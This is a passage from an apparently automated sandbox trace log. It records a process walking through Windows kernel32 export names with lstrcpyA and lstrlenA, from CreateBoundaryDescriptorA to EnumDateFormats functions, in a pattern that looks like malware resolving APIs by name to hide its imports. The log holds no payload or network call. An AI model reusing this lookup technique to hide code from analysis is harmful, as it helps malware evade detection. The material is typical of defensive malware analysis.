returned 13 [0085.902] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0085.903] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0085.903] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0085.903] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0085.903] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0085.903] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0085.903] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0085.903] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0085.903] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0085.903] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0085.903] lstrlenA (lpString="CREATEEVENTA") returned 12 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0085.903] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0085.903] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0085.903] lstrlenA (lpString="CREATEEVENTW") returned 12 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0085.903] lstrlenA (lpString="CREATEFIBER") returned 11 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0085.903] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0085.903] lstrlenA (lpString="CREATEFILEA") returned 11 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0085.903] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0085.903] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0085.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0085.903] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0085.904] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0085.904] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0085.904] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0085.904] lstrlenA (lpString="CREATEFILEW") returned 11 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0085.904] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0085.904] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0085.904] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0085.904] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0085.904] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0085.904] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0085.904] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0085.904] lstrlenA (lpString="CREATEJOBSET") returned 12 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0085.904] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0085.904] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0085.904] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0085.904] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0085.904] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0085.904] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0085.905] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0085.905] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0085.905] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0085.905] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0085.905] lstrlenA (lpString="CREATEPIPE") returned 10 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0085.905] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0085.905] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0085.905] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0085.905] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0085.905] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0085.905] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0085.905] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0085.905] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0085.905] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0085.905] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0085.905] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0085.905] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0085.908] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0085.908] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0085.908] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0085.908] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0085.908] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0085.908] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0085.908] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0085.908] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0085.908] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0085.908] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0085.909] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0085.909] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0085.909] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0085.909] lstrlenA (lpString="CREATETHREAD") returned 12 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0085.909] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0085.909] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0085.909] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0085.909] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0085.909] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0085.909] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0085.909] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0085.909] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0085.909] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0085.909] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0085.909] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0085.909] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0085.909] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0085.909] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0085.910] lstrlenA (lpString="CTRLROUTINE") returned 11 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0085.910] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0085.910] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0085.910] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0085.910] lstrlenA (lpString="DEBUGBREAK") returned 10 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0085.910] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0085.910] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0085.910] lstrlenA (lpString="DECODEPOINTER") returned 13 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0085.910] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0085.910] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0085.910] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0085.910] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0085.910] lstrlenA (lpString="DELETEATOM") returned 10 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0085.910] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0085.910] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0085.910] lstrlenA (lpString="DELETEFIBER") returned 11 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0085.910] lstrlenA (lpString="DELETEFILEA") returned 11 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0085.910] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0085.910] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0085.911] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0085.911] lstrlenA (lpString="DELETEFILEW") returned 11 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0085.911] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0085.911] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0085.911] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0085.911] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0085.911] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0085.911] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0085.911] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0085.911] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0085.911] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0085.911] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0085.911] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0085.911] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0085.911] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0085.911] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0085.911] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0085.911] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0085.911] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0085.912] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0085.912] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0085.912] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0085.912] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0085.912] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0085.912] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0085.912] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0085.912] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0085.912] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0085.912] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0085.912] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0085.912] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0085.912] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0085.912] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0085.912] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0085.912] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0085.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0085.912] lstrlenA 